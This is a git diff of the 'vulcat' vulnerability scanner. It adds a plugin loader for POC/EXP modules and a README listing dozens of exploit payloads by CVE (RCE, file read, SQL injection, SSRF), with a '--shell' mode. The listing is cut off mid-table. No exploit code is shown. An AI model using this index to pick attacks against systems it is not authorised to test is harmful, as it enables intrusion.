diff --git a/PluginManager.py b/PluginManager.py
new file mode 100644
index 0000000..e95064a
--- /dev/null
+++ b/PluginManager.py
@@ -0,0 +1,148 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+代码来源: https://cloud.tencent.com/developer/article/1567791
+经过一点小修改后, 可用于vulcat
+'''
+
+### 插件式框架
+import os
+import sys
+from imp import find_module
+from imp import load_module
+from lib.tool import color
+
+class PluginManager(type):
+    #静态变量配置插件路径
+    __PluginPath = './payloads/'
+
+    #调用时将插件注册
+    def __init__(self, name, bases, dict):
+        if not hasattr(self,'AllPlugins'):
+            self.__AllPlugins = {}
+        else:
+            self.RegisterAllPlugin(self)
+
+    #设置插件路径
+    @staticmethod
+    def SetPluginPath(path):
+        if os.path.isdir(path):
+            PluginManager.__PluginPath = path
+        else:
+            print(color.red('The "{PATH}" is not a valid path!!!\n\nPlease check config.yaml'.format(PATH=path)))
+            print(color.reset())
+            os._exit(1)
+
+    @staticmethod
+    def Whitelist(list, moduleName):
+        '''
+            检查该模块是否在 提供的白名单中
+                在   -> True
+                不在 -> False
+        '''
+        if not list:            # * 如果白名单中没有元素, 说明未启用白名单功能, 默认True
+            return True
+        
+        for l in list:
+            if l in moduleName:
+                return True
+
+        return False
+
+    #递归检测插件路径下的所有插件，并将它们存到内存中
+    @staticmethod
+    def LoadAllPlugin(vulns = []):
+        pluginPath = PluginManager.__PluginPath
+        
+        if not os.path.isdir(pluginPath):
+            raise EnvironmentError
+            # raise EnvironmentError,'%s is not a directory' % pluginPath
+
+        items = os.listdir(pluginPath)
+        for item in items:
+            if os.path.isdir(os.path.join(pluginPath, item)):
+                PluginManager.__PluginPath = os.path.join(pluginPath, item)
+                PluginManager.LoadAllPlugin(vulns)
+            else:
+                if not PluginManager.Whitelist(vulns, item):
+                    continue        # * 如果该Payload不在vulns白名单中, 则跳过添加
+                
+                if item.endswith('.py') and item != '__init__.py':
+                    moduleName = item[:-3]
+                    
+                    if moduleName not in sys.modules:
+                        fileHandle, filePath, dect = find_module(moduleName, [pluginPath])
+                    else:
+                        continue
+
+                    try:
+                        moduleObj = load_module(moduleName, fileHandle, filePath, dect)
+                    except Exception as e:
+                        print(color.red('The POC "{NAME}" is Error!!!'.format(NAME=item)))
+                        print(e)
+                        print(color.reset())
+                        os._exit(1)
+                    finally:
+                        if fileHandle : fileHandle.close()
+
+    #返回所有的插件
+    @property
+    def AllPlugins(self):
+        return self.__AllPlugins
+
+    #注册插件
+    def RegisterAllPlugin(self, aPlugin):
+        pluginName = '.'.join([aPlugin.__module__,aPlugin.__name__])
+        pluginObj = aPlugin()
+        self.__AllPlugins[pluginName] = pluginObj
+
+    #注销插件
+    def UnregisterPlugin(self, pluginName):
+        if pluginName in self.__AllPlugins:
+            pluginObj = self.__AllPlugins[pluginName]
+            del pluginObj
+
+    #获取插件对象。
+    def GetPluginObject(self, pluginName = None):
+        if pluginName is None:
+            return self.__AllPlugins.values()
+        else:
+            result = self.__AllPlugins[pluginName] if pluginName in self.__AllPlugins else None
+            return result
+
+    #根据插件名字，获取插件对象。（提供插件之间的通信）
+    @staticmethod
+    def GetPluginByName(pluginName):
+        if pluginName is None:
+            return None
+        else:
+            for SingleModel in __ALLMODEL__:
+                plugin = SingleModel.GetPluginObject(pluginName)
+                if plugin:
+                    return plugin
+
+# * 插件框架的接入点。便于管理各个插件。
+# * 各个插件通过继承接入点类，利用Python中metaclass的优势，将插件注册。
+# * 接入点中定义了各个插件模块必须要实现的接口。
+class Vuln_Scan(object, metaclass=PluginManager):
+    '''
+        漏洞检测
+    '''
+    def POC(self):
+        print ('Please write the POC() function')
+
+    def EXP(self):
+        print ('Please write the EXP() function')
+
+    def Start(self):
+        print ('Please write the Start() function')
+
+class Model_Placeholder(object, metaclass=PluginManager):
+    '''
+        占位
+    '''
+    def ABCDEFGHIJKLMNOPQRSTUVWXYZ(self):
+        print ('Please write the ABCDEFGHIJKLMNOPQRSTUVWXYZ() function')
+
+__ALLMODEL__ = (Vuln_Scan, Model_Placeholder)
\ No newline at end of file
diff --git a/README.en-us.md b/README.en-us.md
index 1f60efd..c84edaf 100644
--- a/README.en-us.md
+++ b/README.en-us.md
@@ -1,7 +1,7 @@
 # vulcat
 
 [![python](https://img.shields.io/badge/Python-3-blue?logo=python)](https://shields.io/)
-[![version](https://img.shields.io/badge/Version-1.2.0-blue)](https://shields.io/)
+[![version](https://img.shields.io/badge/Version-2.0.0-blue)](https://shields.io/)
 [![license](https://img.shields.io/badge/LICENSE-GPL-yellow)](https://shields.io/)
 [![stars](https://img.shields.io/github/stars/CLincat/vulcat?color=red)](https://shields.io/)
 [![forks](https://img.shields.io/github/forks/CLincat/vulcat?color=red)](https://shields.io/)
@@ -43,10 +43,10 @@ Usage: python3 vulcat.py <options>
 Examples:
 python3 vulcat.py -h
 python3 vulcat.py --list
-python3 vulcat.py -u https://www.example.com/ -o html
-python3 vulcat.py -u https://www.example.com/ -a httpd --log 3
-python3 vulcat.py -u https://www.example.com/ -a thinkphp -v cnvd-2018-24942
-python3 vulcat.py -f url.txt --delay 0.5
+python3 vulcat.py -u https://www.example.com/
+python3 vulcat.py -f url.txt -o html
+python3 vulcat.py -u https://www.example.com/ -v httpd --log 3
+python3 vulcat.py -u https://www.example.com/ -v cnvd-2018-24942 --shell
 ```
 
 ## Options
@@ -102,10 +102,6 @@ Options:
   Application:
     Specify the target type for the scan
 
-    -a APPLICATION, --application=APPLICATION
-                        Specifies the target type, for supported frameworks,
-                        see the tips at the bottom, separated by commas (e.g.
-                        thinkphp / thinkphp,weblogic) (default: auto)
     -v VULN, --vuln=VULN
                         Specify the vulnerability number,With -a/--application
                         to scan a single vulnerability,You can use --list to
@@ -149,15 +145,6 @@ Options:
     Vulnerability list
 
     --list              View all payload
-
-  Supported target types(Case insensitive):
-    airflow, AliDruid, apachedruid, apacheunomi, apisix, appweb, cisco,
-    confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson,
-    flink, gitea, gitlab, grafana, gocd, hadoop, httpd, influxdb, jenkins,
-    jetty, jupyter, joomla, jboss, keycloak, landray, minihttpd,
-    mongoexpress, nacos, nexus, nodejs, nodered, phpmyadmin, phpunit,
-    rails, showdoc, skywalking, solr, spring, supervisor, thinkphp,
-    tomcat, ueditor, uwsgiphp, weblogic, webmin, yonyou, zabbix
 ```
 
 ## language
@@ -190,176 +177,182 @@ ceye-token: Null
 
 2. Then follow the tips in demo.py to fill in your own code and introduce POC into vulcat
 
-## Vulnerabilitys List
+## Payloads List
 <details>
-<summary><strong>The current web vulnerabilities that support scanning: [Click on]</strong></summary>
+<summary><strong>vulcat Payloads List: [Click on]</strong></summary>
 
 ```
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Target               | Vuln id            | Vuln Type    | Sh  | Description                                                  |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Alibaba Druid        | (None)             | unAuth       |  -  | Alibaba Druid unAuthorized                                   |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Alibaba Nacos        | CVE-2021-29441     | unAuth       |  -  | Alibaba Nacos unAuthorized                                   |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache Airflow       | CVE-2020-17526     | unAuth       |  -  | Apache Airflow Authentication bypass                         |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache APISIX        | CVE-2020-13945     | unAuth       |  -  | Apache APISIX default access token                           |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache Druid         | CVE-2021-25646     | RCE          |  Y  | Apache Druid Remote Code Execution                           |
-| Apache Druid         | CVE-2021-36749     | FileRead     |  Y  | Apache Druid arbitrary file reading                          |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache Flink         | CVE-2020-17519     | FileRead     |  Y  | Apache Flink Directory traversal                             |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache Hadoop        | (None)             | unAuth       |  -  | Apache Hadoop YARN ResourceManager unAuthorized              |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache Httpd         | CVE-2021-40438     | SSRF         |  -  | Apache HTTP Server 2.4.48 mod_proxy SSRF                     |
-| Apache Httpd         | CVE-2021-41773     | FileRead/RCE |  Y  | Apache HTTP Server 2.4.49 Directory traversal                |
-| Apache Httpd         | CVE-2021-42013     | FileRead/RCE |  Y  | Apache HTTP Server 2.4.50 Directory traversal                |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache SkyWalking    | CVE-2020-9483      | SQLinject    |  -  | SkyWalking SQLinject                                         |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache Solr          | CVE-2017-12629     | RCE          |  -  | Solr Remote code execution                                   |
-| Apache Solr          | CVE-2019-17558     | RCE          |  Y  | Solr RCE Via Velocity Custom Template                        |
-| Apache Solr          | CVE-2021-27905     | SSRF/FileRead|  Y  | Solr SSRF/FileRead                                           |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache Tomcat        | CVE-2017-12615     | FileUpload   |  -  | Put method writes to any file                                |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache Unomi         | CVE-2020-13942     | RCE          |  Y  | Apache Unomi Remote Express Language Code Execution          |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| AppWeb               | CVE-2018-8715      | unAuth       |  -  | AppWeb Authentication bypass                                 |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Atlassian Confluence | CVE-2015-8399      | FileRead     |  Y  | Confluence any file include                                  |
-| Atlassian Confluence | CVE-2019-3396      | FileRead     |  Y  | Confluence Directory traversal && RCE                        |
-| Atlassian Confluence | CVE-2021-26084     | RCE          |  Y  | Confluence OGNL expression command injection                 |
-| Atlassian Confluence | CVE-2022-26134     | RCE          |  Y  | Confluence Remote code execution                             |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Cisco                | CVE-2020-3580      | XSS          |  -  | Cisco ASA/FTD XSS                                            |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Discuz               | wooyun-2010-080723 | RCE          |  Y  | Remote code execution                                        |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Django               | CVE-2017-12794     | XSS          |  -  | Django debug page XSS                                        |
-| Django               | CVE-2018-14574     | Redirect     |  -  | Django CommonMiddleware URL Redirect                         |
-| Django               | CVE-2019-14234     | SQLinject    |  -  | Django JSONfield SQLinject                                   |
-| Django               | CVE-2020-9402      | SQLinject    |  -  | Django GIS SQLinject                                         |
-| Django               | CVE-2021-35042     | SQLinject    |  -  | Django QuerySet.order_by SQLinject                           |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Drupal               | CVE-2014-3704      | SQLinject    |  -  | Drupal < 7.32 Drupalgeddon SQLinject                         |
-| Drupal               | CVE-2017-6920      | RCE          |  -  | Drupal Core 8 PECL YAML Remote code execution                |
-| Drupal               | CVE-2018-7600      | RCE          |  Y  | Drupal Drupalgeddon 2 Remote code execution                  |
-| Drupal               | CVE-2018-7602      | RCE          |  -  | Drupal Remote code execution                                 |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| ElasticSearch        | CVE-2014-3120      | RCE          |  Y  | ElasticSearch Remote code execution                          |
-| ElasticSearch        | CVE-2015-1427      | RCE          |  Y  | ElasticSearch Groovy Sandbox to bypass && RCE                |
-| ElasticSearch        | CVE-2015-3337      | FileRead     |  Y  | ElasticSearch Directory traversal                            |
-| ElasticSearch        | CVE-2015-5531      | FileRead     |  Y  | ElasticSearch Directory traversal                            |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| F5 BIG-IP            | CVE-2020-5902      | RCE          |  -  | BIG-IP Remote code execution                                 |
-| F5 BIG-IP            | CVE-2022-1388      | unAuth/RCE   |  Y  | BIG-IP Remote code execution                                 |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Fastjson             | CNVD-2017-02833    | unSerialize  |  Y  | Fastjson <= 1.2.24 deSerialization                           |
-| Fastjson             | CNVD-2019-22238    | unSerialize  |  Y  | Fastjson <= 1.2.47 deSerialization                           |
-| Fastjson             | rce-1-2-62         | unSerialize  |  Y  | Fastjson <= 1.2.62 deSerialization                           |
-| Fastjson             | rce-1-2-66         | unSerialize  |  Y  | Fastjson <= 1.2.66 deSerialization                           |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Gitea                | (None)             | unAuth       |  -  | Gitea 1.4.0 unAuthorized                                     |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Gitlab               | CVE-2021-22205     | RCE          |  -  | GitLab Pre-Auth Remote code execution                        |
-| Gitlab               | CVE-2021-22214     | SSRF         |  Y  | Gitlab CI Lint API SSRF                                      |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| GoCD                 | CVE-2021-43287     | FileRead     |  Y  | GoCD Business Continuity FileRead                            |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Grafana              | CVE-2021-43798     | FileRead     |  Y  | Grafana 8.x Directory traversal                              |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Influxdb             | (None)             | unAuth       |  -  | influxdb unAuthorized                                        |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| JBoss                | (None)             | unAuth       |  -  | JBoss unAuthorized                                           |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Jenkins              | CVE-2018-1000861   | RCE          |  Y  | jenkins Remote code execution                                |
-| Jenkins              | (None)             | unAuth       |  Y  | Jenkins unAuthorized                                         |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Jetty                | CVE-2021-28164     | DSinfo       |  -  | jetty Disclosure information                                 |
-| Jetty                | CVE-2021-28169     | DSinfo       |  -  | jetty Servlets ConcatServlet Disclosure information          |
-| Jetty                | CVE-2021-34429     | DSinfo       |  -  | jetty Disclosure information                                 |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Joomla               | CVE-2017-8917      | SQLinject    |  -  | Joomla3.7 Core com_fields SQLinject                          |
-| Joomla               | CVE-2023-23752     | unAuth       |  -  | Joomla unAuthorized                                          |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Jupyter              | (None)             | unAuth       |  -  | Jupyter unAuthorized                                         |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Keycloak             | CVE-2020-10770     | SSRF         |  -  | request_uri SSRF                                             |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Landray              | CNVD-2021-28277    | FileRead/SSRF|  Y  | Landray-OA FileRead/SSRF                                     |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Mini Httpd           | CVE-2018-18778     | FileRead     |  -  | mini_httpd FileRead                                          |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| mongo-express        | CVE-2019-10758     | RCE          |  Y  | Remote code execution                                        |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Nexus Repository     | CVE-2019-5475      | RCE          |  Y  | 2.x yum Remote code execution                                |
-| Nexus Repository     | CVE-2019-7238      | RCE          |  Y  | 3.x Remote code execution                                    |
-| Nexus Repository     | CVE-2019-15588     | RCE          |  Y  | 2019-5475 Bypass                                             |
-| Nexus Repository     | CVE-2020-10199     | RCE          |  Y  | 3.x Remote code execution                                    |
-| Nexus Repository     | CVE-2020-10204     | RCE          |  Y  | 3.x Remote code execution                                    |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Nodejs               | CVE-2017-14849     | FileRead     |  Y  | Node.js Directory traversal                                  |
-| Nodejs               | CVE-2021-21315     | RCE          |  Y  | Node.js Remote code execution                                |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| NodeRED              | CVE-2021-3223      | FileRead     |  Y  | Node-RED Directory traversal                                 |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| phpMyadmin           | WooYun-2016-199433 | unSerialize  |  -  | phpMyadmin Scripts/setup.php Deserialization                 |
-| phpMyadmin           | CVE-2018-12613     | FileInclude  |  Y  | phpMyadmin 4.8.1 Remote File Inclusion                       |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| PHPUnit              | CVE-2017-9841      | RCE          |  Y  | PHPUnit Remote code execution                                |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Ruby on Rails        | CVE-2018-3760      | FileRead     |  Y  | Ruby on Rails Directory traversal                            |
-| Ruby on Rails        | CVE-2019-5418      | FileRead     |  Y  | Ruby on Rails FileRead                                       |
-| Ruby on Rails        | CVE-2020-8163      | RCE          |  -  | Ruby on Rails Remote code execution                          |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| ShowDoc              | CNVD-2020-26585    | FileUpload   |  -  | ShowDoc writes to any file                                   |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Spring               | CVE-2016-4977      | RCE          |  -  | Spring Security OAuth2 Remote Command Execution              |
-| Spring               | CVE-2017-8046      | RCE          |  -  | Spring Data Rest Remote Command Execution                    |
-| Spring               | CVE-2018-1273      | RCE          |  Y  | Spring Data Commons Remote Command Execution                 |
-| Spring               | CVE-2020-5410      | FileRead     |  Y  | Spring Cloud Directory traversal                             |
-| Spring               | CVE-2021-21234     | FileRead     |  Y  | Spring Boot Directory traversal                              |
-| Spring               | CVE-2022-22947     | RCE          |  -  | Spring Cloud Gateway SpEl Remote code execution              |
-| Spring               | CVE-2022-22963     | RCE          |  Y  | Spring Cloud Function SpEL Remote code execution             |
-| Spring               | CVE-2022-22965     | RCE          |  -  | Spring Framework Remote code execution                       |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Supervisor           | CVE-2017-11610     | RCE          |  -  | Supervisor Remote Command Execution                          |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| ThinkPHP             | CVE-2018-1002015   | RCE          |  Y  | ThinkPHP5.x Remote code execution                            |
-| ThinkPHP             | CNVD-2018-24942    | RCE          |  Y  | The forced route is not enabled RCE                          |
-| ThinkPHP             | CNNVD-201901-445   | RCE          |  Y  | Core class Request Remote code execution                     |
-| ThinkPHP             | CNVD-2022-86535    | RCE          |  -  | ThinkPHP "think-lang" Remote code execution                  |
-| ThinkPHP             | rce-2-x            | RCE          |  -  | ThinkPHP2.x Remote code execution                            |
-| ThinkPHP             | ids-sqlinject-5    | SQLinject    |  -  | ThinkPHP5 ids SQLinject                                      |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Ueditor              | (None)             | SSRF         |  -  | Ueditor SSRF                                                 |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| uWSGI-PHP            | CVE-2018-7490      | FileRead     |  Y  | uWSGI-PHP Directory traversal                                |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Oracle Weblogic      | CVE-2014-4210      | SSRF         |  -  | Weblogic SSRF                                                |
-| Oracle Weblogic      | CVE-2017-10271     | unSerialize  |  -  | Weblogic XMLDecoder deSerialization                          |
-| Oracle Weblogic      | CVE-2019-2725      | unSerialize  |  -  | Weblogic wls9_async deSerialization                          |
-| Oracle Weblogic      | CVE-2020-14750     | unAuth       |  -  | Weblogic Authentication bypass                               |
-| Oracle Weblogic      | CVE-2020-14882     | RCE          |  Y  | Weblogic Unauthorized command execution                      |
-| Oracle Weblogic      | CVE-2021-2109      | RCE          |  -  | Weblogic LDAP Remote code execution                          |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Webmin               | CVE-2019-15107     | RCE          |  Y  | Webmin Pre-Auth Remote code execution                        |
-| Webmin               | CVE-2019-15642     | RCE          |  Y  | Webmin Remote code execution                                 |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Yonyou               | CNNVD-201610-923   | SQLinject    |  -  | Yonyou-GRP-U8 Proxy SQLinject                                |
-| Yonyou               | CNVD-2021-30167    | RCE          |  Y  | Yonyou-NC BeanShell Remote code execution                    |
-| Yonyou               | nc-fileread        | FileRead     |  -  | Yonyou-ERP-NC NCFindWeb Directory traversal                  |
-| Yonyou               | u8-oa-getsession   | DSinfo       |  -  | Yonyou-U8-OA getSessionList.jsp Disclosure info              |
-| Yonyou               | u8-oa-test-sql     | SQLinject    |  -  | Yonyou-U8-OA test.jsp SQLinject                              |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Zabbix               | CVE-2016-10134     | SQLinject    |  -  | latest.php or jsrpc.php SQLinject                            |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-vulcat-1.2.0/2023.03.01
-108/Poc
-54/Shell
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| Payloads                                                 | Sh  | Description                                                  |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| 74cms-v5.0.1-sqlinject                                   |  -  | v5.0.1 AjaxPersonalController.class.php SQLinject            |
+| 74cms-v6.0.4-xss                                         |  -  | v6.0.4 help center search box-XSS                            |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| alibaba-druid-unauth                                     |  -  | Alibaba Druid unAuthorized                                   |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| alibaba-nacos-cve-2021-29441-unauth                      |  -  | Alibaba Nacos unAuthorized                                   |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-airflow-cve-2020-17526-unauth                     |  -  | Apache Airflow Authentication bypass                         |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-apisix-cve-2020-13945-unauth                      |  -  | Apache APISIX default access token                           |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-druid-cve-2021-25646-rce                          |  Y  | Apache Druid Remote Code Execution                           |
+| apache-druid-cve-2021-36749-fileread                     |  Y  | Apache Druid arbitrary file reading                          |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-flink-cve-2020-17519-fileread                     |  Y  | Apache Flink Directory traversal                             |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-hadoop-unauth                                     |  -  | Apache Hadoop YARN ResourceManager unAuthorized              |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-httpd-cve-2021-40438-ssrf                         |  -  | Apache HTTP Server 2.4.48 mod_proxy SSRF                     |
+| apache-httpd-cve-2021-41773-rce-fileread                 |  Y  | Apache HTTP Server 2.4.49 Directory traversal                |
+| apache-httpd-cve-2021-42013-rce-fileread                 |  Y  | Apache HTTP Server 2.4.50 Directory traversal                |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-skywalking-cve-2020-9483-sqlinject                |  -  | SkyWalking SQLinject                                         |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-solr-cve-2017-12629-rce                           |  -  | Solr Remote code execution                                   |
+| apache-solr-cve-2019-17558-rce                           |  Y  | Solr RCE Via Velocity Custom Template                        |
+| apache-solr-cve-2021-27905-ssrf-fileread                 |  Y  | Solr SSRF/FileRead                                           |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-tomcat-cve-2017-12615-fileupload                  |  -  | Put method writes to any file                                |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-unomi-cve-2020-13942-rce                          |  Y  | Apache Unomi Remote Express Language Code Execution          |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| appweb-cve-2018-8715-unauth                              |  -  | AppWeb Authentication bypass                                 |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| atlassian-confluence-cve-2015-8399-fileread-fileinclude  |  Y  | Confluence any file include                                  |
+| atlassian-confluence-cve-2019-3396-fileread              |  Y  | Confluence Directory traversal && RCE                        |
+| atlassian-confluence-cve-2021-26084-rce                  |  Y  | Confluence OGNL expression command injection                 |
+| atlassian-confluence-cve-2022-26134-rce                  |  Y  | Confluence Remote code execution                             |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| cisco-cve-2020-3580-xss                                  |  -  | Cisco ASA/FTD XSS                                            |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| discuz-wooyun-2010-080723-rce                            |  Y  | Remote code execution                                        |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| django-cve-2017-12794-xss                                |  -  | Django debug page XSS                                        |
+| django-cve-2018-14574-redirect                           |  -  | Django CommonMiddleware URL Redirect                         |
+| django-cve-2019-14234-sqlinject                          |  -  | Django JSONfield SQLinject                                   |
+| django-cve-2020-9402-sqlinject                           |  -  | Django GIS SQLinject                                         |
+| django-cve-2021-35042-sqlinject                          |  -  | Django QuerySet.order_by SQLinject                           |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| drupal-cve-2014-3704-sqlinject                           |  -  | Drupal < 7.32 Drupalgeddon SQLinject                         |
+| drupal-cve-2017-6920-rce                                 |  -  | Drupal Core 8 PECL YAML Remote code execution                |
+| drupal-cve-2018-7600-rce                                 |  Y  | Drupal Drupalgeddon 2 Remote code execution                  |
+| drupal-cve-2018-7602-rce                                 |  -  | Drupal Remote code execution                                 |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| elasticsearch-cve-2014-3120-rce                          |  Y  | ElasticSearch Remote code execution                          |
+| elasticsearch-cve-2015-1427-rce                          |  Y  | ElasticSearch Groovy Sandbox to bypass && RCE                |
+| elasticsearch-cve-2015-3337-fileread                     |  Y  | ElasticSearch Directory traversal                            |
+| elasticsearch-cve-2015-5531-fileread                     |  Y  | ElasticSearch Directory traversal                            |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| f5bigip-cve-2020-5902-rce-fileread                       |  -  | BIG-IP Remote code execution                                 |
+| f5bigip-cve-2022-1388-unauth-rce                         |  Y  | BIG-IP Authentication bypass RCE                             |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| fastjson-cnvd-2017-02833-rce                             |  Y  | Fastjson <= 1.2.24 deSerialization                           |
+| fastjson-cnvd-2019-22238-rce                             |  Y  | Fastjson <= 1.2.47 deSerialization                           |
+| fastjson-v1.2.62-rce                                     |  Y  | Fastjson <= 1.2.62 deSerialization                           |
+| fastjson-v1.2.66-rce                                     |  Y  | Fastjson <= 1.2.66 deSerialization                           |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| gitea-unauth-fileread-rce                                |  -  | Gitea 1.4.0 unAuthorized                                     |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| gitlab-cve-2021-22205-rce.py                             |  -  | GitLab Pre-Auth Remote code execution                        |
+| gitlab-cve-2021-22214-ssrf                               |  Y  | Gitlab CI Lint API SSRF                                      |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| gocd-cve-2021-43287-fileread                             |  Y  | GoCD Business Continuity FileRead                            |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| grafana-cve-2021-43798-fileread                          |  Y  | Grafana 8.x Directory traversal                              |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| influxdb-unauth                                          |  -  | influxdb unAuthorized                                        |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| jboss-unauth                                             |  -  | JBoss unAuthorized                                           |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| jenkins-cve-2018-1000861-rce                             |  Y  | jenkins Remote code execution                                |
+| jenkins-unauth                                           |  Y  | Jenkins unAuthorized                                         |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| jetty-cve-2021-28164-dsinfo                              |  -  | jetty Disclosure information                                 |
+| jetty-cve-2021-28169-dsinfo                              |  -  | jetty Servlets ConcatServlet Disclosure information          |
+| jetty-cve-2021-34429-dsinfo                              |  -  | jetty Disclosure information                                 |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| joomla-cve-2017-8917-sqlinject                           |  -  | Joomla3.7 Core com_fields SQLinject                          |
+| joomla-cve-2023-23752-unauth                             |  -  | Joomla unAuthorized                                          |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| jupyter-unauth                                           |  -  | Jupyter unAuthorized                                         |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| keycloak-cve-2020-10770-ssrf                             |  -  | request_uri SSRF                                             |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| landray-oa-cnvd-2021-28277-ssrf-fileread                 |  Y  | Landray-OA FileRead/SSRF                                     |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| minihttpd-cve-2018-18778-fileread                        |  -  | mini_httpd FileRead                                          |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| mongoexpress-cve-2019-10758-rce                          |  Y  | Remote code execution                                        |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| nexus-cve-2019-5475-rce                                  |  Y  | 2.x yum Remote code execution                                |
+| nexus-cve-2019-7238-rce                                  |  Y  | 3.x Remote code execution                                    |
+| nexus-cve-2019-15588-rce                                 |  Y  | 2019-5475 Bypass                                             |
+| nexus-cve-2020-10199-rce                                 |  Y  | 3.x Remote code execution                                    |
+| nexus-cve-2020-10204-rce                                 |  Y  | 3.x Remote code execution                                    |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| nodejs-cve-2017-14849-fileread                           |  Y  | Node.js Directory traversal                                  |
+| nodejs-cve-2021-21315-rce                                |  Y  | Node.js Remote code execution                                |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| nodered-cve-2021-3223-fileread                           |  Y  | Node-RED Directory traversal                                 |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| phpmyadmin-cve-2018-12613-fileinclude-fileread           |  -  | phpMyadmin Scripts/setup.php Deserialization                 |
